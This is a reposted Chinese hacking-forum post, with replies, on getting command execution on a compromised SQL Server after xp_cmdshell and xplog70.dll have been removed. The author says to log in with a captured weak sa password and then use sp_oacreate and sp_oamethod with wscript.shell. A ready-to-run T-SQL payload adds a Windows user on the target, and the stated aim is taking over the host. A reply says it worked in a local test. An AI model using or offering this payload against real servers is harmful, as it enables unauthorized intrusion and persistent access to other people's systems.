[转载]当xplog70.dll文件被删除后
信息来源:[url]http://wrsky.com/[/url]起初,笔者也是大叹可惜的,因为如果只是xp_cmdshell被删除还好说,可是如果连xplog70.dll也被删除了,这该如何是好?
狂查资料!
晕啊,怎么到处都没有说的呢?难道没有解决办法吗?
于是,只好自己想办法。可是从那里下手呢?想来想去,还是从sql server本身着手看看。
打开查询分析器。
用你捕获的sa弱口令进入目标机器,当然我们的最终目标是操纵主机而不仅仅是操纵人家的数据库哦 :)
省略思考过程若干。。。。。。(脑细胞累死一大批)
突然,嘎嘎。。。怎么有这么两个存储过程啊sp_oacreate和sp_oamethod,再查查他们的作用和语法,嘿嘿。。。皇天不负苦心人啊。
交待大家怎么用好了,具体的描述,我感觉自己写不出来,没法子,从小讨厌作文。
只要你连接上目标机,并发现这两个存储过程没删除(99%都没删除,看来管理员们都不了解这些存储过程的强大功能啊),那么利用您的查询分析器所有的sa弱口令机器都可以控制咯!
比如我给他添加一个用户!
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
呵呵,如果您发现,cmd.exe都被删掉了,试试command命令,如果这也被删掉了,那这个管理员太变态了。
ok,郑重声明,如果您用来搞破坏,那后果自负哦。同时也不是我希望的,我只是希望大家把平时一点心得拿出来交流,那我们的水平会提高很快啊。
最后,欢迎各位大虾批评指正,加我qq 1175275交流一下。 文章作者思路还可以,试验一下看看是否可以。 [quote][b]下面是引用黑病毒于2005-01-08 13:07发表的:[/b]
文章作者思路还可以,试验一下看看是否可以。[/quote]
本地测试是成功的!
页:
[1]